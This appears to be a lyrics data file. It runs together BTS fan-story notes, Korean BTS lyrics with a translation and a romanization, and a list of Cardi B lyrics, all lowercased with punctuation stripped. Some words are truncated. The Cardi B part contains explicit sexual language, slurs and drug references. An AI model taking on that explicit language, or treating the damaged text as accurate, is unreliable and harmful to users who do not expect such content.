a thing as tomorrow i thought things like that the womans stop began to approach someone pressed the stop request button and other passengers stood up from their seats but in the midst of this that woman didnt stir she just stayed in her seat her head against the window it seemed like she was asleep should i go and wake her i fought with myself for a moment the bus approached the stop the woman didnt move people disembarked the door closed and the bus started to move the woman didnt wake even as we passed the next three stops as i moved to the bus door i fought with myself again it was clear that once i got off the bus no one else would pay attention to her she would wake up somewhere far from her stop and it was impossible to know how much more tired she would be today because of it i left the bus stop and started to walk toward the gas station the bus took off and i didnt look back i had left the hair tie on top of her bag but that was it that wasnt a beginning and as such nor was it an end it was nothing to start with and there was no reason for it to be anything so i thought it really didnt matter namjoon 7 december year the people waiting for the bus rubbed their hands together in the cold i looked down at the dirt clutching the strap of my bag i was trying to not make eye contact with anyone it was a countryside village where only two buses stopped per day from a distance i saw the first bus approaching i boarded the bus behind everyone else i didnt look back when i was passionate about something when i barely had something in my grasp when i had nothing left but things to escape i had conditions i wasnt to look back the moment i looked back the efforts id made until now became little more than seafoam looking back that was a kind of suspicion a kind of lingering attachment and a kind of fear only when i had overcome these things could i finally escape the bus started off i had no plans i had nothing i was passionate about nothing in my group no particular reason to escape it was closer to thoughtlessly running away from my mothers tired face my wandering sibling my fathers illness starting with the situation in our house that grew more difficult with every passing day from my family who enforced sacrifice and tranquility and from me who pretended to know nothing and restrained myself from trying to adjust and grow resigned but most of all it was closer to running from poverty if anyone asked if its a crime to be poor everyone would say its not but is that really the truth poverty gnaws on so many things things that were precious become meaningless you give up things you cant give up you grow suspicious and fearful and resigned the bus would arrive at a familiar stop in a few hours when i left from that place a year ago i had left no message behind and now i was returning with no sign or warning i tried to recall my friends faces i had cut off contact with all of them what were they all doing these days would they be glad to see me would we be able to get together and laugh the way we had back then there was frost on the windows and i couldnt see the scenery outside on top of the frost i slowly moved my finger i have to survive hoseok 4 july year i stood in the hallway the whole time she was receiving first aid even though it was night the hospital hallway was bustling with people moisture dripped from my hair wet with sweat and rain i dropped the bag i had taken off of her a variety of things tumbled out of it a few coins rolled away and a ball pen and a towel in the middle of it all was an airplane eticket i picked it up and scanned it at that moment the doctor called me he said it was a mild concussion and nothing to worry about and after a moment she came out as well are you okay she said that her head just hurt a little and she took her bag from me then she spotted the eticket peeking out and looked up at my face i shifted my bag to my other shoulder and said that we should go pretending that it was nothing as we left the hospital it was raining as hard as ever we stood side by side outside the door hoseokah she said it looked like she had something to say wait a second ill get an umbrella i ran off thoughtlessly into the rain there was a convenience store in the distance i knew that she had auditioned for an overseas dance team some time ago the plane ticket meant that she had made it i didnt want to hear her say it i didnt have the confidence to congratulate her hoseok july year 0 when i counted to three i heard the sound of laughter like a hallucination the next moment the young me passed by holding someones hand i looked back quickly but there was no one there except my classmates staring at me hoseokah the teacher called my name only then did i realize where i was it was a class field trip i was counting the fruits that were drawn in the textbook five six i kept counting but as i did my voice trembled and my hands grew sweaty the memory of that time kept surfacing i couldnt clearly remember my mothers face that day i only remembered the chocolate bar she gave me as we looked around the amusement park hoseokah count to ten and then open your eyes when i had finished counting and opened my eyes my mother was gone i waited and waited but she never returned i had only counted to nine if i counted one more it would have been fine but my voice wouldnt come out my ears were ringing and my surroundings grew cloudy the teacher kept pointing telling me to keep counting my friends were staring at me i couldnt remember my mothers face it seemed like if i counted one more my mother would really never come back for me just like that i collapsed to the ground 4 july year by the time i returned to my senses i had washed my a so much that i was losing skin my hands were trembling and i was short of breath my eyes were bloodshot what had just happened came back to me in fragments for a moment i had lost focus i was dancing with a noona from the dance club a collaborative dance but i had lost my flow and we collided i fell to the rough floor and my a started to bleed at that moment i had remembered what happened at the flowering arboretum i thought that i had overcome it but that wasnt the case i had to run away i had to wash it away i had to look away the me in the mirror was the same eightyearold kid who had run away in the rain then all at once i realized noona had fallen down too there was nothing i could do all i could do was fall and hurt someone leave them behind and tremble at my own pain only to run after them too late with an umbrella before stopping every time i took a step rainwater soaked my sneakers car headlights passes me by it wasnt okay no it was okay it didnt hurt it wasnt that serious of an injury i was really okay 9 may year in the end i had to go to the flowering arboretum i had quit telling myself the lie that i didnt remember what happened there i had to stop living in hiding in the hospital and stop having seizures if i wanted to do that i had to go to the place with that intent i went to the bus stop every day but i couldnt ride the bus to the arboretum yoongi hyung came and sat next to me after id already let three buses go by i asked what was up and hyung said he was bored and had nothing to do then he asked why i was sitting here like this i thought about why i was sitting here like this it was because i had no courage i wanted to pretend i was okay now that i knew a little that i surpassed it on my own but in truth i was afraid i was afraid that i might encounter something that i might not withstand that i might have another seizure yoongi hyung looked relaxed he slumped down like had not a thing in the world to worry him and said that the weather was nice said all kinds of useless things after i heard that i realized the weather really was nice i had been so worried that i didnt bother looking at my surroundings the sky was so blue a wa breeze blew on occasion from far off the shuttle bus for the arboretum was coming the bus stopped and the door opened the driver looked at me on impulse i spoke hyung do you want to come with me taehyung 7 july year my side hurt so badly it seemed to be tearing sweat fell in drops in the nooks and crannies of the railroad in the vacant lot behind the convenience store under the overpass the girl was nowhere to be found i had even run to the bus stop but as expected i didnt see her the people waiting for their buses looked at me strangely what had happened we hadnt promised to meet but it was still strange that girl always appeared from somewhere and followed me around even if i told her it was annoying it was no use but now she was nowhere to be found even in the places we used to go together i came to a familiar wall and slowed my steps there was graffiti there we had drawn together it was the first thing she had ever drawn on top of it there was a large x drawn it was her i hadnt seen her do it but i knew why there was no response instead several after images overlapped on the wall her laughing at me after i had lain down on the railroad tracks and hit my head her helping me up after id fallen trying to help her run away her angry expression when we passed in front of a photo studio with a family photo in the window her gaze following the students we passed by unbeknownst even to her as we had sprayed this wall together i had said if you have a problem tell me about it dont just grumble to yourself the x was drawn over all of those memories it seemed like it was saying all of it was fake i had made my hands into fists why of course there was no response i kept walking we were alone again me and her taehyung 0 march year 0 i slid down the hallway my feet making noisy sounds then i stopped i could see namjoon standing in front of our classroom our classroom nobody knew this but i called that place our classroom me and the hyungs and it was ours i caught my breath and approached i was going to startle them principal i had barely taken five steps when i head an urgent voice through the open classroom window it seemed like seok hyung i stopped walking was seok hyung talking to the principal right now in our classroom why then i heard my name and yoongi hyungs and i saw namjoon hyung draw in a startled breath as if having sensed it seok hyung suddenly opened the door there was a phone in seok hyungs hand his shock and confusion was plain on his face i couldnt see namjoon hyungs expression i hid and watched seok hyung looked confused hyung must have had a reason after he spoke namjoon hyung passed by seok hyung and went into the classroom i couldnt believe it seok hyung told the principal what yoongi hyung and i had done for the last several days he told everything about skipping class and climbing over the wall and fighting with other kids but namjoon hyung said that was all okay what are you doing here i turned around in shock it was hoseok hyung and hoseok hyung pretended to be even more shocked then slung his a over my shoulders in a moment of confusion i let hoseok hyung pull me into that classroom namjoon hyung and seok hyung were talking and they looked up seok hyung got up in a hurry and said something had come up he left the classroom i looked at namjoon hyungs expression he had watched seok hyungs retreating back but now he laughed as if nothing was wrong at that moment a thought occurred to me namjoon hyung must have had a reason because hyung knew more than me and was smarter and older and because this was our classroom i went into the classroom smiling the foolish smile that the others teasingly called my rectangle smile i thought that i wouldnt tell anyone else that i had overheard that conversation 6 july year i sneakily broke a flower off the hospitals wreath i kept laughing and having to bow my head to hide it the midsummer sunlight was blindingly bright i knocked on the hospital room door but there was no reply i knocked again no one was there it was only full of a very quiet darkness i left the hospital room i had met her here when i was bored and stifled and pushing my wheelchair like crazy up and down the hallway she had appeared so suddenly that i barely had time to stop and there she stood a girl with her hair tied up in a ponytail when i left the hospital i saw a bench i remembered we had listened to music together and drawn sitting there i was still holding the wildflower in my hand there was no one to give it to 0 september year 0 jeon youre not still going there are you i didnt answer i just stood there staring at the toes of my shoes when i didnt answer he hit me on the head with the attendance file but even so i didnt open my mouth it was the classroom i used with the hyungs after the day i had followed the hyungs around and we had discovered that classroom there wasnt a single day i hadnt gone maybe the hyungs didnt know sometimes they didnt come because they had other plans or were busy with parttime jobs i hadnt seen either seok hyung or yoongi hyung in a few days but not me i didnt skip a single day there were days when nobody came at all but that's okay even if it wasnt today then they would come tomorrow and if not tomorrow then the day after it was okay you only learned bad things following them around he hit me again i lifted my gaze and looked at him he hit me again the image came to me of yoongi hyung hitting me i gritted my teeth and endured i didnt want to lie and say i hadnt been going now i was standing again in front of that classroom it seemed like the hyungs would be there if i opened the door it seemed like they would look up from the fame they were playing and ask me why i was so late seok hyung and namjoon hyung would be reading books yoongi hyung would be playing the piano and hoseok hyung and hyung would be dancing but when i opened the door only hoseok hyung was there he was cleaning up the things we had left behind in the classroom i held the door handle and just stood there hyung came over and put his a around my shoulders then he led me outside lets go the classroom door closed behind us i suddenly realized those days were gone and they would never return stigma 숨겨왔어 i tell you something 그저 묻어두기엔 이젠 버틸 수가 없는 걸 왜 그땐 말 못 했는지 어차피 아파와서 정말 버틸 수가 없을 걸 pre now cry 너에게 너무 미안할 뿐야 또 cry 널 지켜주지 못해서 더 깊이 더 깊이 상처만 깊어져 되돌릴 수 없는 깨 유리 조각 같아 더 깊이 매일이 가슴만 아파져 내 죄를 대신 받던 연약하기만 했던 너 그만 울고 tell me something 용기 없던 내게 말해봐 그 때 나한테 왜 그랬어 미안 됐어 내게 무슨 자격 있어 이래보라고 저래보라고 너에게 말하겠어 더 깊이 더 깊이 상처만 깊어져 되돌릴 수 없는 깨 유리 조각 같아 더 깊이 매일이 가슴만 아파져 내 죄를 대신 받던 연약하기만 했던 너 i'm sorry i'm sorry i'm sorry my brother 숨겨도 감춰도 지워지지 않어 are you calling me a sinner 무슨 말이 더 있겠어 i'm sorry i'm sorry i'm sorry my sister 숨겨도 감춰도 지워지지 않어 so cry please dry my eyes ooh 저 빛이 저 빛이 내 죄를 비춰줘 돌이킬 수 없는 붉은 피가 흘러내려 더 깊이 매일이 죽을 것만 같아 그 벌을 받게 해줘 내 죄를 사해줘 제발 너의 컨버스하이 너의 컨버스하이 너의 컨버스하이 컨버스하이 너의 컨버스하이에 꽂혔나 봐 별 수 없나 봐 나는 wo 너의 컨버스하이에 꽂혔나 봐 너무 좋아 다 자꾸 wo 내게 하루만 시간이 있다면 난 컨버스하이 만든 사람을 만날 거야 그리곤 말하겠지 당신이 이 세상을 구했어 넌 저 여자들을 다시 태어나게 한 거야 f your chanel f your alexander mcqueen f your raf simons 일단 이리 와서 check it 0만원이면 두 켤레를 사 넌 내가 원하는 걸 알지 흰 티에 청 반바지 빨간 컨버스하이 that's it alright 빨주노초파남보 니 발에 무지개는 shot like 람보 날 저격해 탕탕 shout out wow wow 니 몸매와 함께면 더 하악하악 컨 taxi 컨 cycle 컨 subway no thanks 난 컨 bus 타고 부릉부릉 저 하늘 별보단 오늘은 니 신발의 별을 볼래 하하 다 남준이 몰래 pre 스치면 인연 스며들면 사랑 이라고 누가 말했었는데 넌 아예 내게 물들어버렸나 니가 좋아 그래도 컨버스로우는 신지 마 너의 컨버스하이에 꽂혔나 봐 별 수 없나 봐 나는 wo 너의 컨버스하이에 꽂혔나 봐 너무 좋아 다 자꾸 wo post all 너의 컨버스하이 i really really want you 컨버스하이 i really really like you 컨버스하이 i really really need you 컨버스하이 컨버스하이 컨버스 컨버스 i really hate 컨버스 화려한 니 겉모습에는 말야 검정스타킹에 아찔한 하이힐 그래 그것은 사기야 근데 더 어울리는 것은 조던 numbers ha 모르겠니 컨버스는 니 매력을 죽이는 옥의 티 아무튼 날 만날 때는 컨버스를 신지마 무엇보다 벗기가 무척이나 힘들잖아 pre 스치면 인연 스며들면 사랑 이라고 누가 말했었는데 넌 아예 내게 물들어버렸나 니가 좋아 그래도 컨버스로우는 신지 마 너의 컨버스하이에 꽂혔나 봐 별 수 없나 봐 나는 wo 너의 컨버스하이에 꽂혔나 봐 너무 좋아 다 자꾸 wo post all 너의 컨버스하이 i really really want you 컨버스하이 i really really like you 컨버스하이 i really really need you 컨버스하이 컨버스하이 all 너의 컨버스하이 i really really want you 컨버스하이 i really really like you 컨버스하이 i really really need you 컨버스하이 컨버스하이 conhigh 보고 싶다 이렇게 말하니까 더 보고 싶다 너희 사을 보고 있어도 보고 싶다 너무 야속한 시간 나는 우리가 밉다 이젠 얼굴 한 번 보는 것 조차 힘들어 우리가 여긴 온통 겨울 뿐이야 팔월에도 겨울이 와 마음은 시간을 달려가네 홀로 남은 설국열차 니 손 잡고 지구 반대편까지 가 겨울을 끝내고파 그리움들이 얼마나 눈처럼 내려야 그 봄날이 올까 friend pre 허공을 떠도는 작은 먼지처럼 작은 먼지처럼 날리는 눈이 나라면 조금 더 빨리 네게 닿을 수 있을 텐데 눈꽃이 떨어져요 또 조금씩 멀어져요 보고 싶다 보고 싶다 보고 싶다 보고 싶다 얼마나 기다려야 또 몇 밤을 더 새워야 널 보게 될까 널 보게 될까 만나게 될까 만나게 될까 oohoohooh post 추운 겨울 끝을 지나 다시 봄날이 올 때까지 꽃 피울 때까지 그곳에 좀 더 머물러줘 머물러줘 니가 변한 건지 니가 변한 건지 아니면 내가 변한 건지 아니면 내가 변한 건지 이 순간 흐르는 시간조차 미워 우리가 변한 거지 뭐 모두가 그런 거지 뭐 그래 밉다 니가 넌 떠났지만 단 하루도 너를 잊은 적이 없었지 난 솔직히 보고 싶은데 이만 너를 지울게 그게 널 원망하기보단 덜 아프니까 pre 시린 널 불어내 본다 연기처럼 하얀 연기처럼 말로는 지운다 해도 사실 난 아직 널 보내지 못하는데 눈꽃이 떨어져요 또 조금씩 멀어져요 보고 싶다 보고 싶다 보고 싶다 보고 싶다 얼마나 기다려야 또 몇 밤을 더 새워야 널 보게 될까 널 보게 될까 만나게 될까 만나게 될까 ahahahah ah you know it all you're my best friend 아침은 다시 올 거야 어떤 어둠도 어떤 계절도 영원할 순 없으니까 벚꽃이 피나봐요 이 겨울도 끝이 나요 보고 싶다 보고 싶다 ah 보고 싶다 보고 싶다 ahahah 조금만 기다리면 기다리면 며칠 밤만 더 새우면 만나러 갈게 만나러 갈게 데리러 갈게 데리러 갈게 yeah eheh yeah yeah post 추운 겨울 끝을 지나 다시 봄날이 올 때까지 꽃 피울 때까지 그곳에 좀 더 머물러줘 머물러줘 i'm fine 시리도록 푸른 하늘 아래 눈 떠 흠뻑 쏟아지는 햇살이 날 어지럽게 해 한껏 숨이 차오르고 심장은 뛰어 느껴져 너무 쉽게 나 살아있다는 걸 괜찮아 우리가 아니어도 슬픔이 날 지워도 먹구름은 또 끼고 나 끝없는 꿈 속이어도 한없이 구겨지고 날개는 찢겨지고 언젠가 내가 내가 아니게 된달지어도 괜찮아 오직 나만이 나의 구원이잖아 못된 걸음걸이로 절대 죽지 않고 살아 how you doin' i'm fine 내 하늘은 맑아 모든 아픔들이여 say goodbye 잘 가 pre 차가운 내 심장은 널 부르는 법을 잊었지만 외롭지 않은 걸 괜찮아 괜찮아 깜깜한 밤 어둠은 잠든 꿈을 흔들어 놓지만 두렵지 않은 걸 괜찮아 괜찮아 i'm feeling just fine fine fine 이젠 너의 손을 놓을게 i know i'm all mine mine mine cuz i'm just fine i'm feeling just fine fine fine 더 이상은 슬프지 않을래 i could see the sunshine shine shine cuz i'm just fine just fine hey hope world i'm just fine 내 아픔 다 이겨낼 수 있어 너 없이 나 i'm just fine 걱정 마 이젠 웃을 수 있고 네 목소린 모두 알아 주니까 4 i'm so fine you so fine 슬픔과 상처는 모두 다 이미 지나간 추억이 됐으니 웃으며 보내주자고 we so fine i'm so fine you so fine 우리들 미래는 기쁨만 가득할 테니 걱정은 접어둔 채 이젠 즐겨 수고했어 we so fine pre 차가운 내 심장은 널 부르는 법을 잊었지만 외롭지 않은 걸 괜찮아 괜찮아 깜깜한 밤 어둠은 잠든 꿈을 흔들어 놓지만 두렵지 않은 걸 괜찮아 괜찮아 i'm feeling just fine fine fine 이젠 너의 손을 놓을게 i know i'm all mine mine mine cuz i'm just fine i'm feeling just fine fine fine 더 이상은 슬프지 않을래 i could see the sunshine shine shine cuz i'm just fine just fine 혹시 너에게도 보일까 이 스산한 달빛이 너에게도 들릴까 이 희미한 메아리가 i'm feeling just fine fine fine 혼자서라도 외쳐보겠어 되풀이될 이 악몽에 주문을 걸어 i'm feeling just fine fine fine 몇 번이라도 되뇌보겠어 또 다시 쓰러대도 난 괜찮아 i'm feeling just fine fine fine 혼자서라도 외쳐보겠어 되풀이될 이 악몽에 주문을 걸어 i'm feeling just fine fine fine 몇 번이라도 되뇌보겠어 또 다시 쓰러대도 난 괜찮아 i'm fine i'm fine bts 봄날 brit rock remix hangul 보고 싶다 oooh oooh 보고 싶다 이렇게 말하니까 더 보고 싶다 너희 사을 보고 있어도 보고 싶다 너무 야속한 시간 나는 우리가 밉다 이젠 얼굴 한 번 보는 것도 힘들어 우리가 여긴 온통 겨울 뿐이야 팔월에도 겨울이 와 마음은 시간을 달려가네 홀로 남은 설국열차 니 손 잡고 지구 반대편까지 가 겨울을 끝내고파 그리움들이 얼마나 눈처럼 내려야 그 봄날이 올까 friend 허공을 떠도는 작은 먼지처럼 작은 먼지처럼 날리는 눈이 나라면 조금 더 빨리 네게 닿을 수 있을 텐데 pre 눈꽃이 떨어져요 또 조금씩 멀어져요 보고 싶다 보고 싶다 보고 싶다 보고 싶다 얼마나 기다려야 또 몇 밤을 더 새워야 널 보게 될까 널 보게 될까 만나게 될까 만나게 될까 추운 겨울 끝을 지나 다시 봄날이 올 때까지 꽃 피울 때까지 그곳에 좀 더 머물러줘 머물러줘 4 니가 변한 건지 니가 변한 건지 아니면 내가 변한 건지 아니면 내가 변한 건지 이 순간 흐르는 시간조차 미워 우리가 변한 거지 뭐 모두가 그런 거지 뭐 5 그래 밉다 니가 넌 떠났지만 단 하루도 너를 잊은 적이 없었지 난 솔직히 보고 싶은데 이만 너를 지울게 그게 널 원망하기보단 덜 아프니까 6 시린 널 불어내 본다 연기처럼 하얀 연기처럼 말로는 지운다 해도 사실 난 아직 널 보내지 못하는데 pre 눈꽃이 떨어져요 또 조금씩 멀어져요 보고 싶다 보고 싶다 보고 싶다 보고 싶다 얼마나 기다려야 또 몇 밤을 더 새워야 널 보게 될까 널 보게 될까 만나게 될까 만나게 될까 you know it all youre my best friend 아침은 다시 올 거야 어떤 어둠도 어떤 계절도 영원할 순 없으니까 pre 벚꽃이 피나봐요 이 겨울도 끝이 나요 보고 싶다 보고 싶다 보고 싶다 보고 싶다 조금만 기다리면 며칠 밤만 더 새우면 만나러 갈게 만나러 갈게 데리러 갈게 데리러 갈게 추운 겨울 끝을 지나 다시 봄날이 올 때까지 꽃 피울 때까지 그곳에 좀 더 머물러줘 머물러줘 english translation miss you oooh oooh miss you saying this makes me miss you even more miss you even though im looking at your photo times so cruel i hate us seeing each other for once is now so hard between us its all winter here even in august my heart is running on the time alone on the snowpiercer wanna get to the other side of the earth holding your hand wanna put an end to this winter how much longing should we see snowing down to have the days of spring friend like the tiny dust tiny dust floating in the air will i get to you a little faster if i was the snow in the air pre snowflakes fall down and get farther away little by little i miss you i miss you i miss you i miss you how long do i have to wait and how many sleepless nights do i have to spend to see you to see you to meet you to meet you passing by the edge of the cold winter until the days of spring until the days of flower blossoms please stay please stay there a little longer 4 is it you who changed is it you who changed or is it me or is it me i hate this moment this time flowing by we are changed you know just like everyone you know 5 yes i hate you you left me but i never stopped thinking about you not even a day honestly i miss you but ill erase you 'cause it hurts less than to blame you 6 i try to exhale you in pain like smoke like white smoke i say that ill erase you but i cant really let you go yet pre snowflakes fall down and get farther away little by little i miss you i miss you i miss you i miss you how long do i have to wait and how many sleepless nights do i have to spend to see you to see you to meet you to meet you you know it all youre my best friend the morning will come again no darkness no season is eternal pre maybe its cherry blossoms and this winter will be over i miss you i miss you i miss you i miss you wait a little bit just a few more nights ill be there to see you i'll go there to meet you ill come for you i'll come for you passing by the edge of the cold winter until the days of spring until the days of flower blossoms please stay please stay there a little longer romanization bogo sipda oooh oooh bogo sipda ireohge malhanikka deo bogo sipda neohui saeul bogo isseodo bogo sipda neomu yasokhan sigan naneun uriga mipda ijen eolgul han beon boneun geosdo himdeureo uriga yeogin ontong gyeoul ppuniya palworedo gyeouri wa maeumeun siganeul dallyeogane hollo nameun seolgugyeolcha ni son japgo jigu bandaepyeonkkaji ga gyeoureul kkeutnaegopa geuriumdeuri eolmana nuncheoreom naeryeoya geu bomnari olkka friend heogongeul tteodoneun jageun meonjicheoreom jageun meonjicheoreom nallineun nuni naramyeon jogeum deo ppalli nege daheul su isseul tende pre nunkkocci tteoreojyeoyo tto jogeumssik meoreojyeoyo bogo sipda bogo sipda bogo sipda bogo sipda eolmana gidaryeoya tto myeot bameul deo saewoya neol boge doelkka neol boge doelkka mannage doelkka mannage doelkka chuun gyeoul kkeuteul a dasi bomnari ol ttaekkaji kkot piul ttaekkaji geugose jom deo meomulleojwo meomulleojwo 4 niga byeonhan geonji niga byeonhan geonji animyeon naega byeonhan geonji animyeon naega byeonhan geonji i sungan heureuneun siganjocha miwo uriga byeonhan geoji mwo moduga geureon geoji mwo 5 geurae mipda niga neon tteonassjiman dan harudo neoreul ijeun jeogi eopseossji nan soljikhi bogo sipeunde iman neoreul jiulge geuge neol wonmanghagibodan deol apeunikka 6 sirin neol bureonae bonda yeongicheoreom hayan yeongicheoreom malloneun jiunda haedo sasil nan ajik neol bonaeji moshaneunde pre nunkkocci tteoreojyeoyo tto jogeumssik meoreojyeoyo bogo sipda bogo sipda bogo sipda bogo sipda eolmana gidaryeoya tto myeot bameul deo saewoya neol boge doelkka neol boge doelkka mannage doelkka mannage doelkka you know it all youre my best friend achimeun dasi ol geoya eotteon eodumdo eotteon gyejeoldo yeongwonhal sun eopseunikka pre beojkkocci pinabwayo i gyeouldo kkeuti nayo bogo sipdabogo sipda bogo sipdabogo sipda jogeumman gidarimyeon myeochil bamman deo saeumyeon mannareo galge mannareo galge derireo galge derireo galge chuun gyeoul kkeuteul a dasi bomnari ol ttaekkaji kkot piul ttaekkaji geugose jom deo meomulleojwo meomulleojwo heavy breathing verse 오늘따라 림이 멀어보여 코트 위에 한숨이 고여 현실이 두려운 소년 공을 던질 때면 유일하게 맘이 되려 놓여 홀로 던지는 공 림을 향해서 내가 던지는 건 수많은 고민과 삶의 걱정거리 세상을 아는 척 하지만 아직 설익은 몸 슛 코트가 나의 놀이터 손짓에 따라서 발 옆엔 작은 공이 튀어 성적은 바닥을 기지만 난 더 오히려 세상에 다 잘 될 거라며 괜시리 소리쳐 하지만 세상은 되려 겁줘 그럴 거면 멈춰 머리를 채운 상념 공 대신 미래를 던져 또 남들이 칠하는 별점과 성공의 기준에 결격 덕에 암처럼 퍼지는 걱정 god damn it 던져버린 공과 함께 퍼 웃음 턱까지 차오른 이 숨은 꿈틀대는 꿈들 빨라지는 드리블 행복해지는 마음 이 순간은 영원할 듯 하지만 해지는 밤이 다시 찾아오면 좀먹는 현실 정신을 차리면 또 겁먹은 병신 같은 내 모습에 자꾸만 또 겁이 나 덮쳐오는 현실감 남들은 앞서 달려 가는데 왜 난 아직 여기 있나 숨을 쉬어 아니면 꿈을 꿔 지금 심장박동에 맞춰 다시 노를 저어 남들의 얄팍한 잣대에 갇혀 모른 척 하며 살다간 코트처럼 인생도 노을 져 what am i doin' with my life 이 순간은 언제든 다시 찾아오지 않아 다시 나에게 되물어봐 지금 행복한가 그 답은 이미 정해졌어 난 행복하다 heavy breathing 방탄소년단 filter 너의 따분한 그 표정 지루한 발끝 please look at me now 핸드폰은 내려놔 고개 돌릴 생각도 마 let me know your type 날 골라 쓰면 돼 yeah pre oh 너의 눈을 나의 손으로 포개 oh 다가가 비밀에 널 데려갈게 완전히 새로운 세상에 yeah 네 감은 눈을 떠봐 이제 go 팔레트 속 색을 섞어 pick your filter 어떤 나를 원해 너의 세상을 변화시킬 im your filter 네 맘에 씌워줘 okay 어때 조금 느낌이 와 아직 모자라 yes girl you have your chance i can be your genie how bout aladdin 뭐든 돼 줄게 날 골라 쓰면 돼 yeah pre oh 네 꿈처럼 널 감싸 안을 거야 oh 은밀한 spec이야 난 너를 위해 매일 새로울 거야 늘 똑같은 건 재미없잖아 팔레트 속 색을 섞어 pick your filter 어떤 나를 원해 너의 세상을 변화시킬 im your filter 네 맘에 씌워줘 불현듯 아이로 변한 날 봐 볼수록 귀여워 미치도록 미치도록 취향도 기준도 뛰어넘어 넌 오직 나만을 원하게 돼 yeah 날 만든 사람 바로 너니까 난 여태 네가 본 적 없는 brand new filter 내게 널 맡겨봐 더 짜릿한 걸 볼 수 있게 pick your filter 나만을 담아봐 post nanananananananana pick your filter 나만을 담아봐 nanananananananana im your filter 내게 널 맡겨봐 새로운 우리가 될 거야 ayy 날 네 맘에 씌워줘 방탄소년단 잠시 jung kook 매번 같은 하루들 중에 들 중에 너를 만날 때 가장 난 행복해 행복해 매번 다른 일상들 속에 들 속에 너란 사람은 내게 가장 특별해 특별해 별일은 없지 아픈 곳은 없겠지 난 요즘에 글쎄 붕 떠 버린 것 같아 많은 시간 덕에 이런 노랠 쓰네 이건 너를 위한 노래 yeah 노래 yeah 노래 jung kook 자 떠나자 푸른 바다로 우리가 함께 뛰어놀던 저 푸른 바다로 괜한 걱정들은 잠시 잠시 내려놓은 채로 잠시 잠시 우리끼리 즐겨보자 함께 추억하는 푸른 바다 한가운데 작은 섬 jung kook 비록 지금은 멀어졌어도 우리 마음만은 똑같잖아 내 곁에 네가 없어도 yeah 네 곁에 내가 없어도 yeah 우린 함께인 걸 다 알잖아 매번 같은 하루들 중에 들 중에 너를 만날 때 가장 난 행복해 행복해 매번 다른 일상들 속에 들 속에 너란 사람은 내게 가장 특별해 특별해 4 아침 들풀처럼 일어나 거울처럼 난 너를 확인 눈꼽 대신 너만 묻었다 잔뜩 또 무겁다 멍 많은 무르팍이 거릴 거닐며 생각해 이 별이 허락해 주는 우리의 거리 oh can i be your bibilly hills like you did the same to me baby 5 너무 빠른 건 조금 위험해 너무 느린 건 조금 지루해 너무 빠르지도 않게 또는 느리지도 않게 우리의 속도에 맞춰 가보자고 이건 꽤나 긴 즐거운 롤러코스터 all 비록 지금은 멀어졌어도 우리 마음만은 똑같잖아 내 곁에 네가 없어도 yeah 네 곁에 내가 없어도 yeah 우린 함께인 걸 다 알잖아 매번 같은 하루들 중에 들 중에 너를 만날 때 가장 난 행복해 행복해 매번 다른 일상들 속에 들 속에 너란 사람은 내게 가장 특별해 특별해"]
cardi10 = ["up up up ayy up uh up look this is fire once upon a time man i heard that i was ugly came from a bitch who nigga wanna fuck on me i said my face bomb ass tight racks stack up shaq height jewelry on me flashlight i been lit since last night hit him with that good good make a nigga act right broke boys don't deserve no pussy i know that's right pre big bag bussin' out the bentley bentayga man balenciaga bardi back and all these bitches fucked it's big bags bussin' out the bentley bentayga man birkin bag bardi back and all you bitches fucked if it's up then it's up then it's up then it's stuck if it's up then it's up then it's up then it's stuck huh ayy up then it's up if it's up then it's stuck huh if it's up then it's up then it's up then it's stuck huh woo i could make the party hot i could make your body rock bitches say they fuckin' with me chances are they probably not if i had a dick you'd probably lick it like a lollipop hoes speakin' capenese hit 'em with karate chop i'm forever poppin' shit pullin' up and droppin' shit gotta argue with him 'cause a nigga love a toxic bitch niggas out here playin' gotta make 'em understand if ain't no ring on my finger you ain't goin' on my 'gram i said my face bomb ass tight racks stack up shaq height yeah jewelry on me flashlight huh i been lit since last night woo hit him with that good good make a nigga act right ah broke boys don't deserve no pussy i know that's right pre big bag bussin' out the bentley bentayga man balenciaga bardi back and all these bitches fucked woo it's big bags bussin' out the bentley bentayga man birkin bag bardi back and all you bitches fucked if it's up then it's up then it's up then it's stuck if it's up then it's up then it's up then it's stuck huh ayy up then it's up if it's up then it's stuck if it's up then it's up then it's up then it's stuck huh ayy bitches ain't fuckin' with me now and i can see why dirtyass dustyass bitch you got pink eye bitches want smoke until i bring it to they doorstep tell that bitch back back breath smell like horse sex ha put it on him now he will never be the same he won't tatted on my ass 'cause i really like the pain ah he nutted on my butt i said i'm glad that you came if that nigga had a twin i would let 'em run a train skrrt pre big bag bussin' out the bentley bentayga man balenciaga bardi back and all these bitches fucked woo it's big bags bussin' out the bentley bentayga man birkin bag bardi back and all you bitches fucked ooh if it's up then it's up then it's up then it's stuck if it's up then it's up then it's up then it's stuck huh woo up then it's up if it's up then it's stuck woo if it's up then it's up then it's up then it's stuck huh look gotta play it safe huh no face no case hahaha cardi b bardi in a 'rari diamonds all over my body 0 you a fool for this one shinin'\u2005all\u2005over my body bardi\u2005put that lil' bitch on molly bardi cheeze\u2005beatz cardi b your bitch wanna party with cardi gang cartier cardi in a 'rari skrrtskrrt diamonds all over my body shinin' all over my body cardi got your bitch on molly bitch you ain't gang you lame bentley truck lane to lane blow out the brain i go insane insane i drop a check on the chain fuck up a check in the flame cardi took your man you upset uh cardi got rich they upset yeah cardi put the pussy on offset cardi b cardi b brain on offset cardi took your man you upset uh cardi got rich they upset yeah cardi put the pussy on offset cardi b cardi b brain on offset verse playboi carti who you know in that new 'rari what yeah hold up we poppin' these pills percocets thought it was molly check it out hold up all of these flows is stylish check it out what shawty got playboi behind her playboi who you know harder than carti check it out check it out you know i got goons in the lobby yeah no i can't fuck with nobody yeah yeah these niggas they timid they ain't 'bout it hold up yeah what fucking your bitch she on my head like a bonnet bitch my young nigga fresh out the projects hold up bitch diamonds they jump out the fountain what hold up i'm counting no fuckin' accountant shit hold up don't care if that pussy got mileage hold up yeah young nigga i'm styling your stylist cardi b playboi carti your bitch wanna party with cardi woo cartier cardi in a 'rari skrrtskrrt diamonds all over my body shinin' all over my body cardi got your bitch on molly bitch you ain't gang you lame yeah yeah bentley truck lane to lane blow out the brain hold up yeah i go insane insane hold up i drop a check on the chain fuck up a check in the flame hold up hold up hold up cardi took your man you upset uh what cardi got rich they upset yeah yeah cardi put the pussy on offset cardi b cardi b brain on offset ha cardi took your man you upset uh yeah cardi got rich they upset yeah what cardi put the pussy on offset yeah cardi b cardi b brain on offset hold up hold up check it out playboi carti cardi b hold up hold up cardi hold up yeah woo woo hold up cardi hold up ooh hold up ooh verse look they gave a 